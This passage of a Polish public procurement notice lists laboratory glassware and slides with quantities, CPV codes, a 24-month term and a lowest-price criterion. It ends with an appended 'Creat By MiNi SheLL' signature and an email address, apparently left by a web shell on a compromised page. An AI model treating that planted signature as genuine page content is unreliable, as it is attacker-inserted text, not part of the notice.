10.	Lejki szklane śr. 20 cm zwykłe szklane	10 szt.
11.	Barwiacz do szkiełek, wym. zew. 90x74mm, wym. wew. 80 x 62mm	20 szt.
12.	Pisaki do szkła	40 szt.
13.	Płytki Petriego śr.10 cm	40 szt.
14.	Pudełka tekturowe 83 x 83 x 30 mm z pokrywką	8 000 szt.
15.	Szkiełka nakrywkowe  24 x 24	20 000 szt.
16.	Szkiełka nakrywkowe  32 x 24	20 000 szt.
17.	Szkiełka nakrywkowe  50 x 24	20 000 szt.
18.	Szkiełka nakrywkowe  60 x 24	20 000 szt.
19.	Szkiełka podstawowe szlif jednostronny	120 000 szt.
20.	Szkiełka silanizowane szlif jednostronny	400 szt.
21.	Zlewki poj. 150 ml zwykłe szklane	40 szt.
22.	Zlewki poj. 2000 ml zwykłe szklane	4 szt.
23.	Zlewki poj. 250 ml zwykłe szklane	20 szt.
24.	Zlewki poj. 50 ml zwykłe szklane	100 szt.
25.	Zlewki poj. 600 ml zwykłe szklane	20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 38.43.71.10-1, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com